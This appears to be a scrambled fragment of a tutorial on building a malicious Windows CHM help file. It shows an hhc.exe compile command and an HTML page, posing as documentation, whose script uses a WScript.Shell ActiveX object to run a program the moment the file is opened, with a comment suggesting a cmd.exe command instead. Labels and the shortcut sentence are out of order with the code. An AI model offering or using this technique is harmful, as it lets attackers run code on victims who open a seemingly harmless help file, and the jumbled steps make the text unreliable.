hhc.exe project.hhp

Attackers can embed a shortcut (.lnk) that executes:

<!DOCTYPE html>
<html>
<head>
  <title>Help</title>
  <script language="javascript">
    // Runs immediately when the CHM is opened
    var shell = new ActiveXObject("WScript.Shell");
    shell.Run("calc.exe", 0, false); // or cmd.exe /c whoami > out.txt
  </script>
</head>
<body>
  <p>Loading documentation...</p>
</body>
</html>

(using hhc.exe from HTML Help Workshop):

(e.g., index.html):